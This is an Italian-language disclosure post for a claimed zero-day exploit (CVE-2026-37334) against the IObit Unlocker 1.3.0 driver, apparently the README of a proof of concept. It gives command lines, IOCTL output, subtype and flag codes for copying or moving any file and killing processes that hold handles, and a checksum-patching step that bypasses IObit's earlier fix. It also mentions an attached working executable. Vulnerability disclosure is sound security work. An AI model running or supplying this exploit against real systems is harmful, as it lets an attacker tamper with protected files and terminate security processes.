
(0 day) CVE-2026-37334 Sposta o copia qualsiasi file. Aggira la patch precedente con un trucco di checksum. IObit Unlocker v. 1.3.0
(0 day) Sposta o copia qualsiasi file. Bypassa la patch precedente con un trucco di checksum.
Writeup: https://nathan2.com/files/iobit.pdf Info generali: https://nathan2.com/posts/iobit/
L'ho scoperto senza sapere che esisteva un altro exploit precedente che lo aveva scoperto per primo. Tuttavia, questo bypassa la patch che IObit ha applicato. Funziona nella versione 1.3.0
Utilizzo:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- Invio Richiesta ---
Sorgente: C:\copied.txt
Destinazione: C:\t.txt
Sottotipo: 4 | Flag: 1
IOCTL riuscito. Il driver ha restituito 4 byte.
Verifica: Il file di destinazione esiste/è accessibile.
Altri flag:
Utilizzo: UnlockerCLI.exe <PercorsoSorgente> <PercorsoDestinazione> <Sottotipo> <Flag>
Esempio: UnlockerCLI.exe "C:\Percorso Con Spazi\file.txt" "C:\backup\file.txt" 3 (sottotipo) 5 (flag operazione)
Sottotipi: (almeno quelli che uso io) 3=sposta, 4=copia
Flag operazione: 0=Non rimuovere l'handle, 1 = rimuovi gli handle, 2 = termina i processi con handle, 4 = termina i processi e rimuovi gli handle, 5??? sperimenta.
L'eseguibile allegato dovrebbe essere funzionante e già patchato. In caso contrario, leggi sotto.
Usa il patcher di checksum per patchare il PoC. In questo modo:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
Dimensione File Originale: 235449 byte
Somma Alternata Corrente: 11044471
Somma XOR Corrente: 43
Il file ha già i checksum corretti. Nessuna modifica necessaria.
Questo consentirà all'eseguibile di comunicare con il driver IObitUnlocker.